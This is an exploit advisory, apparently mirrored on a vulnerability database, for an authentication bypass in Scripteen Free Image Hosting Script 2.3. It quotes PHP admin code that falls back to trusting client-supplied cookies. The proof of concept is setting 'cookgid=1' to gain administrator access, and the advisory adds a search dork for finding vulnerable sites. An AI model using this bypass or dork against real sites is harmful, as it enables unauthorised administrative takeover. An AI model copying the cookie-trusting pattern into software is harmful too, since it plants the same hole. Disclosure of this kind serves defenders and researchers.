Lucene search

Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln

🗓️ 24 Jul 2009 00:00:00Reported by QabandiType

zdt🔗 0day.today👁 24 Views

Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handlin

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

=====================================================================
Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln
=====================================================================


                                            ||          ||   | ||
                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
                                    (  :  /    (_)    /           (      .

                                             ___________________
                                           _/QQQQQQQQQQQQQQQQQQQ\__
                                        __/QQQ/````````````````\QQQ\___
                                      _/QQQQQ/                  \QQQQQQ\
                                     /QQQQ/``                    ```QQQQ\
                                    /QQQQ/                          \QQQQ\
                                   |QQQQ/    By  Qabandi             \QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                                   |QQQQ|                            |QQQQ|
                                    \QQQQ\                      __  /QQQQ/
                                     \QQQQ\                    /QQ\_QQQQ/
                                      \QQQQ\                   \QQQQQQQ/
                                       \QQQQQ\                 /QQQQQ/_
                                        ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                           ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                              ```````````````````     `````

=Vuln:		Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling
=INFO:		http://www.scripteen.com/
=BUY:  		---
=Download:      http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html
=DORK:		DORK:"Powered by Scripteen Free Image Hosting Script V 2.3"

                                  ____________
                              _-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````

none

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in ".\admin\header.php"

$userid=$_SESSION['userid'];
$usergid=$_SESSION['usergid'];
if (!$userid || empty($userid) || $userid==""){
	$userid = $_COOKIE['cookid'];
	$usergid = $_COOKIE['cookgid'];
}

// this is the scripts authentication code, pasted in all admin files.. fail.

if($usergid!="1")
{
	header("Location: logout.php");	exit;
}
---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
Set:

Cookie: cookgid=1

---------------------------------------===--------------------------------------




#  0day.today [2018-04-01]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

24 Jul 2009 00:00Current

7.1High risk

Vulners AI Score7.1